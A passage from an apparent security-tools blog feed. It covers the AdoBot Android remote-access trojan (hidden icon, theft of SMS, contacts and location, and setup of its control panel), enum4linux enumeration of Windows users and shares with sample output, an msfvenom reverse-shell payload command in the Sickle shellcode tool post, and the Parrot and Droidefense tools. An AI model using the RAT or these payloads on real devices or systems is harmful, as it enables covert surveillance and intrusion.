  5. In the actual code, there will be a variable called c2 - Change this variable to the IP address or domain name of the C2 server
  6. Compile and your implant executable is ready to run.

Search

ADO Bot Androit Remote Admin Tool

November 9, 2017, 9:30 am
$
0
0
Its rather self explanatory... this is an android RAT with the following features:

 enter image description here
enter image description here
enter image description here
enter image description here
Features
Realtime command execution
Schedule commands
Hidden app icon (stealth mode)
Fetch SMS in
Fetch call logs
Fetch contacts
Send SMS command
Forward received/sent SMS
Monitor location
Update apk remotely
Data collected are retained in database
Realtime notifications about device status
Transfer bot reporting to another server
For android 6 and above:
You can view the permissions of the app
The app asks for permission when a certain command is sent the there is no permission
Panel Setup Info:
Server Setup
Create app on Heroku
Sign up to Heroku
Create a new app (Click the New button in the top right of the dashboard)
Name your app to whatever you want. Let’s name it your-app for example purposes
Setup Mysql Server
Go to “Resources” tab
In the “Addons” section, type “ClearDB” and select the first suggestion
Click Provision when prompted
Configure the app
Go to the settings tab of your new app
Click Reveal Config Vars button
Copy the VALUE of CLEARDB_DATABASE_URL KEY
Create a new KEY named DATABASE_URL and the paste into the VALUE field the copied value of CLEARDB_DATABASE_URL. Click ADD to save.
Create a new KEY named ADMIN_USERNAME and the VALUE will be your desired username used to login into the panel later. Then click ADD button
Create a new KEY named ADMIN_PASSWORD and the VALUE will be your desired password used to login into the panel later. Then click ADD button
Upload the source to Heroku
Download and install Heroku CLI as outlined here
If you don’t have git command line tool, you might as well install it
After installation of Heroku CLI, open command line and type:
$ heroku login
Enter your login email and password
Go to “Settings” tab
Find the “Info” section and copy the Heroku Git URL field. It looks like https://git.heroku.com/your-app.git
Download this repository and extract the contents of the zip file
Then cd into the the extracted directory. ex cd ~/Downloads/AdoBot
Then enter the commands below (Remember to change your-app to the name of your app)
$ git init
$ git remote add heroku https://git.heroku.com/your-app.git
$ git add .
$ git commit -am "initial commit"
$ git push heroku master
$ heroku open
That’s it, your done! Now set up the AdoBot android client if you haven’t done it yet.
Development
System Requirements
NodeJS
MySql
Setup
Create adobot mysql schema/database.
Edit ./config/config.json to your preferences.
Install dependencies:
$ sudo npm install -g sequelize-cli gulp gulp-cli
$ npm install
Run local server

$ node index.js
Browse to http://127.0.0.1:3000
This includes both the actual Bot and The Panel:
Bot: https://github.com/adonespitogo/AdoBot
Panel: https://github.com/adonespitogo/AdoBot-IO

“For Educational Purposes Only”

Parrot Security 3.9 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

November 9, 2017, 10:11 am
$
0
0

Security GNU/Linux distribution designed with cloud pentesting and IoT security in mind.

It includes a full portable laboratory for security and digital forensics experts, but it also includes all you need to develop your own softwares or protect your privacy with anonymity and crypto tools.


Details

Security

Parrot Security includes a full arsenal of security oriented tools to perform penetration tests, security audits and more. With a Parrot usb drive in your pocket you will always be sure to have all you need with you.

Privacy

Parrot includes by default TOR, I2P, anonsurf, gpg, tccf, zulucrypt, veracrypt, truecrypt, luks and many other tecnologies designed to defend your privacy and your identity.

Development

If you need a comfortable environment with updated frameworks and useful libraries already installed, Parrot will amaze you as it includes a full development-oriented environment with some powerful editors and IDEs pre-installed and many other tools installable from our repository.

Features

System Specs
  • Debian GNU/Linux 9 (stretch)
  • Custom hardened Linux 4.8 kernel
  • Rolling release updates
  • Powerful worldwide mirror servers
  • High hardware compatibility
  • Community-driven development
  • free(libre) and open source project

Cryptography

Parrot includes many cryptographic softwares which are extremely useful when it comes to protect your confidential data and defend your privacy.

Parrot includes several cryptographic front-ends to work both with symmetric and asymmetric encryption, infact it natively supports volumes encryption with LUKS, TrueCrypt, VeraCrypt and the hidden TrueCrypt/VeraCrypt volumes with nested algorythms support.

The whole system can be installed inside an encrypted partition to protect your computer in case of theft.

Another swiss army knife of your privacy is GPG, the GNU Privacy Guard, an extremely powerful PGP software that lets you create a private/public pair of keys to apply digital signatures to your messages and to allow other people to send you encrypted messages that only your private key can decrypt, in can also handle multiple identities and subkeys, and its power resides in its ring of trust as PGP users can sign each other's keys to make other people know if a digital identity is valid or not.

Even our software repository is digitally signed by GPG, and the system automatically verifies if an update was altered or compromised and it refuses to upgrade or to install new software if our digital signature is not found or not valid.

Privacy

Your privacy is the most valuable thing you have in your digital life and the whole Parrot Team is exaggeratedly paranoid when it comes to users privacy, infact our system doesn't contain tracking systems, and it is hardened in deep to protect users from prying eyes.

Parrot has developed and implemented several tricks and softwares to achieve this goal, and AnonSurf is one of the most important examples, it is a software designed to start TOR and hijack all the internet traffic made by the system through the TOR network, we have also modified the system to make it use DNS servers different from those offered by your internet provider.

Parrot also includes torbrowser, torchat and other anonymous services, like I2P, a powerful alternative to TOR.

Programming

The main goal of an environment designed by hackers for hackers is the possibility to change it, adapt it, transform it and use it as a development platform to create new things, this is why Parrot comes out of the box with several tools for developers such as compilers, disassemblers, IDEs, comfortable editors and powerful frameworks.

Parrot includes QTCreator as its main C, C++ and Qt framework. Another very useful tool is Geany, a lightweight and simple IDE which supports a huge amount of programming languages, while we also include Atom, the opensource editor of the future developed by GitHub, and many compilers and interpreters with their most important libraries are pre-installed and ready to use.


And of course many other editors, development softwares and libraries are available through our software repository where we keep all the development tools always updated to their most cutting edge but reliable version.

Changelog

Parrot 3.9 is now ready, and it includes some important new features that were introduced to make the system more secure and reliable.
The most important feature is the new sandbox system, introduced to protect many applications from 0day attacks out of the box. The sandbox is based on firejail, a suid program which is very easy to configure and customize to protect many critical applications in a quick and effective way (if an application does not work as expected, customize the corresponding firejail profile to be more permissive).

enum4linux - Tool for Enumerating Information from Windows and Samba Systems

November 10, 2017, 7:00 am
$
0
0
 


Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
Enum4linux is a tool for enumerating information from Windows and Samba systems.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.



Key features 
  • RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)
  • User listing (When RestrictAnonymous is set to 0 on Windows 2000)
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval (using polenum)

Overview

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.
The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.

Dependencies

You will need to have the Samba package installed as this script is basically just a wrapper around rpcclient, net, nmblookup and smbclient.

Usage 
$ enum4linux.pl -h
enum4linux v0.8.2 (https://labs.portcullis.co.uk/application/enum4linux/)
Copyright (C) 2006 Mark Lowe (mrl@portcullis-security.com)

Simple wrapper around the tools in the samba package to provide similar functionality
to enum (http://www.bindview.com/Services/RAZOR/Utilities/Windows/enum_readme.cfm).
Some additional features such as RID cycling have also been added for convenience.

This is an ALPHA release only.  Some of the options supported by the original "enum"
aren't implemented in this release.

Usage: /usr/local/bin/enum4linux.pl [options] ip

Options are (like "enum"):
-U             get userlist
-M             get machine list*
-N             get namelist dump (different from -U|-M)*
-S             get sharelist
-P             get password policy information*
-G             get group and member list
-L             get LSA policy information*
-D             dictionary crack, needs -u and -f*
-d             be detailed, applies to -U and -S
-u username    specify username to use (default "")
-p password    specify password to use (default "")
-f filename    specify dictfile to use (wants -D)*

* = Not implemented in this release.

Additional options:
-a             Do all simple enumeration (-U -S -G -r -o -n)
-h             Display this help message and exit
-r             enumerate users via RID cycling
-R range       RID ranges to enumerate (default: 500-550,1000-1050, implies -r)
-s filename    brute force guessing for share names
-k username    User(s) that exists on remote system (default: administrator,guest,krbtgt,domain admins,root,bin,none)
Used to get sid with "lookupsid known_username"
Use commas to try several users: "-k admin,user1,user2"
-o             Get OS information
-i             Get printer information
-w workgroup   Specify workgroup manually (usually found automatically)
-n             Do an nmblookup (similar to nbtstat)
-v             Verbose.  Shows full commands being run (net, rpcclient, etc.)

RID cycling should extract a list of users from Windows (or Samba) hosts which have
RestrictAnonymous set to 1 (Windows NT and 2000), or "Network access: Allow
anonymous SID/Name translation" enabled (XP, 2003).

If no usernames are known, good names to try against Windows systems are:
- administrator
- guest
- none
- helpassistant
- aspnet

The following might work against samba systems:
- root
- nobody
- sys

NB: Samba servers often seem to have RIDs in the range 3000-3050.

Examples

Below are examples which demonstrate most of the features of enum4linux. Output has been edited for brevity in most cases.

Verbose mode
Before we delve into the features of enum4linux, it’s worth pointing out that verbose mode shows you the underlying commands being run by enum4linux (rpcclient, smblient, etc.). This is useful if you want to use the underlying commands manually, but can’t figure out the syntax to use. Note the lines beginning with [V] in the output below:
$ enum4linux.pl -v 192.168.2.55
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:18:51 2008

----- Enumerating Workgroup/Domain on 192.168.2.55 ------
[V] Attempting to get domain name with command: nmblookup -A '192.168.2.55'
[+] Got domain/workgroup name: WORKGROUP

----- Getting domain SID for 192.168.2.55 -----
[V] Attempting to get domain SID with command: rpcclient -U''%'' 192.168.2.55 -c 'lsaquery' 2>&1
Domain Name: WORKGROUP
Domain Sid: S-0-0
[+] Host is part of a workgroup (not a domain)

----- Session Check on 192.168.2.55 -----
[V] Attempting to make null session using command: smbclient //'192.168.2.55'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 192.168.2.55 allows sessions using username '', password ''

The “Do Everything” option
As you read through the following section you’ll probably think that there are a lot of options you need to remember. If you just want enum4linux to try to enumerate all the information it can from a remote host, just use the -a option:
$ enum4linux.pl -a 192.168.2.55
NB: This won’t do dictionary-based share name guessing, but does pretty much everything else.

Obtain list of usernames (RestrictAnonymous = 0)
This feature is similar to enum.exe -U IP. It returns a complete list of usernames if the server allows it. On Windows 2000 the RestrictAnonymous registry setting must be set to 0 for this feature to work. The user list is show twice in two different formats because type different underlying commands are used to retrieve the data.
$ enum4linux.pl -U 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 27 16:02:50 2008

----- Users on 192.168.2.55 -----
index: 0x1 RID: 0x1f4 acb: 0x210 Account: Administrator Name: Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3ee acb: 0x10 Account: basic Name: basic Desc:
index: 0x3 RID: 0x3ed acb: 0x10 Account: blah Name: Desc:
index: 0x4 RID: 0x1f5 acb: 0x215 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e9 acb: 0x214 Account: IUSR_PORTCULLIS Name: Internet Guest Account Desc: Built-in account for anonymous access to Internet Information Services
index: 0x6 RID: 0x3ea acb: 0x214 Account: IWAM_PORTCULLIS Name: Launch IIS Process Account Desc: Built-in account for Internet Information Services to start out of process applications
index: 0x7 RID: 0x3ec acb: 0x10 Account: mark Name: Desc:
index: 0x8 RID: 0x3e8 acb: 0x214 Account: TsInternetUser Name: TsInternetUser Desc: This user account is used by Terminal Services.

user:[Administrator] rid:[0x1f4]
user:[basic] rid:[0x3ee]
user:[blah] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[IUSR_PORTCULLIS] rid:[0x3e9]
user:[IWAM_PORTCULLIS] rid:[0x3ea]
user:[mark] rid:[0x3ec]
user:[TsInternetUser] rid:[0x3e8]

Obtain a list of usernames (using authentication)
If you’ve managed to obtain a username and password for the host, you can use it to retrieve a complete list of users regardless of RestrictAnonymous settings. In the example below we use the administrator account, but any account will do:
$ enum4linux.pl -u administrator -p password -U 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 13:19:35 2008

----- Users on 192.168.2.55 -----
index: 0x1 RID: 0x1f4 acb: 0x210 Account: Administrator Name: Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3ee acb: 0x10 Account: basic Name: basic Desc:
index: 0x3 RID: 0x3ed acb: 0x10 Account: blah Name: Desc:
index: 0x4 RID: 0x1f5 acb: 0x215 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e9 acb: 0x214 Account: IUSR_PORTCULLIS Name: Internet Guest Account Desc: Built-in account for anonymous access to Internet Information Services
index: 0x6 RID: 0x3ea acb: 0x214 Account: IWAM_PORTCULLIS Name: Launch IIS Process Account Desc: Built-in account for Internet Information Services to start out of process applications
index: 0x7 RID: 0x3ec acb: 0x10 Account: mark Name: Desc:
index: 0x8 RID: 0x3e8 acb: 0x214 Account: TsInternetUser Name: TsInternetUser Desc: This user account is used by Terminal Services.

user:[Administrator] rid:[0x1f4]
user:[basic] rid:[0x3ee]
user:[blah] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[IUSR_PORTCULLIS] rid:[0x3e9]
user:[IWAM_PORTCULLIS] rid:[0x3ea]
user:[mark] rid:[0x3ec]
user:[TsInternetUser] rid:[0x3e8]

Obtaining a List of Usernames via RID Cycling (RestrictAnonymous = 1)
To obtain the usernames corresponding to a default range of RIDs (500-550,1000-1050) use the -r option:
$ enum4linux.pl -r 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:27:21 2008

----- Target information -----
Target ........... 192.168.2.55
RID Range ........ 500-550,1000-1050
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

----- Users on 192.168.2.55 via RID cycling (RIDS: 500-550,1000-1050) -----
[I] Assuming that user "administrator" exists
[+] Got SID: S-1-5-21-1801674531-1482476501-725345543 using username '', password ''
S-1-5-21-1801674531-1482476501-725345543-500 W2KSQL\Administrator (Local User)
S-1-5-21-1801674531-1482476501-725345543-501 W2KSQL\Guest (Local User)
S-1-5-21-1801674531-1482476501-725345543-513 W2KSQL\None (Domain Group)
S-1-5-21-1801674531-1482476501-725345543-1000 W2KSQL\TsInternetUser (Local User)
S-1-5-21-1801674531-1482476501-725345543-1001 W2KSQL\IUSR_PORTCULLIS (Local User)
S-1-5-21-1801674531-1482476501-725345543-1002 W2KSQL\IWAM_PORTCULLIS (Local User)
S-1-5-21-1801674531-1482476501-725345543-1004 W2KSQL\mark (Local User)
S-1-5-21-1801674531-1482476501-725345543-1005 W2KSQL\blah (Local User)
S-1-5-21-1801674531-1482476501-725345543-1006 W2KSQL\basic (Local User)
You can specify a custom range of RIDs using the -R option. This implies -r, so your don’t have specify the -r option:
$ enum4linux.pl -R 500-520 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:27:53 2008

----- Target information -----
Target ........... 192.168.2.55
RID Range ........ 500-520
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

----- Users on 192.168.2.55 via RID cycling (RIDS: 500-520) -----
[I] Assuming that user "administrator" exists
[+] Got SID: S-1-5-21-1801674531-1482476501-725345543 using username '', password ''
S-1-5-21-1801674531-1482476501-725345543-500 W2KSQL\Administrator (Local User)
S-1-5-21-1801674531-1482476501-725345543-501 W2KSQL\Guest (Local User)
S-1-5-21-1801674531-1482476501-725345543-513 W2KSQL\None (Domain Group)
Before RID cycling can start, enum4linux needs to get the SID from the remote host. It does this by requesting the SID of a known username / group (pretty much the same thing every other RID-cycling tool does). You can see in the above output a list of known usernames. These are tried in turn, until enum4linux finds the SID of the remote host.
If you’ve very unlucky, this list won’t be good enough and you won’t be able to get the SID. In this case, use the -k option to specify a different known username:
$ enum4linux.pl -k anotheruser -R 500-520 192.168.2.55
You can specify a list using commas:
$ enum4linux.pl -k user1,user2,user3 -R 500-520 192.168.2.55

Group membership
If the remote host allow it, you can get a list of groups and their members using the -G option (like in enum.exe):
$ enum4linux.pl -G 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 13:54:48 2008

----- Groups on 192.168.2.55 -----
[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Group 'Guests' (RID: 546) has members:
W2KSQL\Guest
W2KSQL\TsInternetUser
W2KSQL\IUSR_PORTCULLIS
W2KSQL\IWAM_PORTCULLIS
Group 'Users' (RID: 545) has members:
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
W2KSQL\mark
W2KSQL\blah
W2KSQL\basic
Group 'Replicator' (RID: 552) has members:
Group 'Power Users' (RID: 547) has members:
Group 'Administrators' (RID: 544) has members:
W2KSQL\Administrator
W2KSQL\mark
W2KSQL\blah
Group 'Backup Operators' (RID: 551) has members:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has members:
W2KSQL\Administrator
W2KSQL\Guest
W2KSQL\TsInternetUser
W2KSQL\IUSR_PORTCULLIS
W2KSQL\IWAM_PORTCULLIS
W2KSQL\mark
W2KSQL\blah
W2KSQL\basic
As with the -U option for user enumeration, you can also specify -u user -p pass to provide login credentials if required. Any user account will do, you don’t have to be an admin.

Check if host is part of a domain or workgroup
Enum4linux uses rpcclient’s lsaquery command to ask for a host’s Domain SID. If we get a proper SID we can infer that it is part of a domain. If we get the answer S-0-0 we can infer the host is part of a workgroup. This is done by default, so no command line options are required:
$ enum4linux.pl 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 27 16:02:50 2008

----- Getting domain SID for 192.168.2.55 -----
Domain Name: WORKGROUP
Domain Sid: S-0-0
[+] Host is part of a workgroup (not a domain)

Getting nbtstat Information
The -n option causes enum4linux to run nmblookup and does some extra parsing on it’s output to provide human-readable information about the remote host.
$ enum4linux.pl -n 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:21:13 2008

----- Nbtstat Information for 192.168.2.55 -----
Looking up status of 192.168.2.55
W2KSQL <00> - B <tt>Workstation Service
W2KSQL <20> - B </tt><tt>File Server Service
WORKGROUP <00> - </tt><tt>B </tt><tt>Domain/Workgroup Name
INet~Services <1c> - </tt><tt>B </tt><tt>IIS
WORKGROUP <1e> - </tt><tt>B </tt><tt>Browser Service Elections
W2KSQL <03> - B </tt><tt>Messenger Service
IS~W2KSQL <00> - B </tt><tt>IIS
ADMINISTRATOR <03> - B </tt><tt>Messenger Service</tt>

MAC Address = 00-0C-29-A4-12-6C

Listing Windows shares
If the server allows it, you can obtain a complete list of shares with the -S option. This uses smbclient under the bonnet which also seems to grab the browse list.
Enum4linux will also attempt to connect to each share with the supplied credentials (null session usually, but you could use -u user -p pass to use something else). It will report whether it could connect to the share and whether it was possible to get a directory listing.
$ enum4linux.pl -S 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:28:28 2008

----- Enumerating Workgroup/Domain on 192.168.2.55 ------
[+] Got domain/workgroup name: WORKGROUP

----- Share Enumeration on 192.168.2.55 -----
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
ADMIN$ Disk Remote Admin
C$ Disk Default share
session request to 192.168.2.55 failed (Called name not present)
session request to 192 failed (Called name not present)

Server Comment
--------- -------
W2KSQL
WEBVULNB
WINORACLE

Workgroup Master
--------- -------
PTT SBS
WORKGROUP WEBVULNB

----- Attempting to map to shares on 192.168.2.55 -----
//192.168.2.55/IPC$ Mapping: OK Listing: DENIED
//192.168.2.55/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.2.55/C$ Mapping: DENIED, Listing: N/A
Some hosts don’t let your retrieve a share list. In these situations, it is still possible to perform a dictionary attack to guess share names. First we demonstrate the -S option failing:
$ enum4linux.pl -S 192.168.2.76
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:54:02 2008</tt>

----- Share Enumeration on 192.168.2.76 -----
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

----- Attempting to map to shares on 192.168.2.76 -----
The output below show the use of the -s option with a dictionary file guess the names of some shares:
$ enum4linux.pl -s share-list.txt 192.168.2.76
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:54:20 2008</tt>

----- Session Check on 192.168.2.76 -----
[+] Server 192.168.2.76 allows sessions using username '', password ''

----- Brute Force Share Enumeration on 192.168.2.76 -----
c$ EXISTS
e$ EXISTS
admin$ EXISTS
ipc$ EXISTS, Allows access using username: '', password: ''

Getting OS information
The -o option gets OS information using smbclient. Certain versions of Windows (e.g. 2003) even return service pack information.
$ enum4linux.pl -o 192.168.2.76
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:55:11 2008</tt>

----- OS information on 192.168.2.76 -----
[+] Got OS info for 192.168.2.76 from smbclient: Domain=[PTT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED

Printer information
You can get some information about printers known to the remote device with the -i option. I don’t know why you’d want to do this. I only implemented it because I could.

$ enum4linux.pl -i 192.168.2.69
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:55:32 2008</tt>

----- Getting printer info for 192.168.2.69 -----
flags:[0x800000]
name:[\\192.168.2.69\SharedFax]
description:[\\192.168.2.69\SharedFax,Microsoft Shared Fax Driver,]
comment:[]


Sickle is a shellcode development tool

November 10, 2017, 10:30 am
$
0
0
Sickle is a shellcode development tool, created to speed up the various steps needed to create functioning shellcode.
enter image description here
Sickle can aid in the following: – Identifying instructions resulting in bad characters – Format output in various languages (python, perl, javascript, etc) – Accept shellcode via stdin and format it / detect bad characters – Execute shellcode in both Windows and Linux environments – Compare reversed shellcode to original – Disassemble shellcode into assembly language (ARM, x86, etc)
Dependencies:
  • apt-get install python3-pip
  • pip3 install capstone
Usage:
pip3 install capstone
git clone https://github.com/wetw0rk/Sickle && cd Sickle
chmod +x sickle.py
cp sickle.py /usr/bin/sickle
sickle -h
Example:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=(your IPAddress) LPORT=1 -f raw -o test
sickle -r test --run-shellcode
sickle -r example -b "\xa0a"
1
2
3
4
5
6
7
8
9
10
pip3 install capstone
git clone https://github.com/wetw0rk/Sickle && cd Sickle
chmod +x sickle.py
cp sickle.py /usr/bin/sickle
sickle -h
Example:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=(your IPAddress) LPORT=1 -f raw -o test
sickle -r test --run-shellcode
sickle -r example -b "\xa0a"

Droidefense – Advance Android Malware Analysis Framework

November 10, 2017, 11:01 am
$
0
0
enter image description here
What Droidefense is? 
Droidefense (originally named atom: analysis through observation machine)* is the codename for android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researcher have on they every day work. For those situations on where the malware has anti-analysis routines, Droidefense attemps to bypass them in order to get to the code and ‘bad boy’ routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection. tracer pid check, and so on.
Droidefense uses an innovative idea in where the code is not decompiled rather than viewed. This allow us to get the global view of the execution workflow of the code with a 100% accuracy on gathered information. With this situation, Droidefense generates a fancy html report with the results for an easy understanding.
Dependencies: 
+ Java JDK 1.7 or Higher 
+ Maven
Usage:
git clone https://github.com/droidefense/engine && cd engine
mvn clean package -DskipTests
cd target
java -jar droidefense-cli-1.0-SNAPSHOT.jar -i sample.apk

or
wget https://github.com/droidefense/engine/releases/download/0.1-unstable/droidefense.-0.1-unstable-alpha.zip
unzip droidefense.-0.1-unstable-alpha.zip
java -jar droidefense.-1.0-unstable-alpha.jar -i sample.apk
Viewing all 541 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>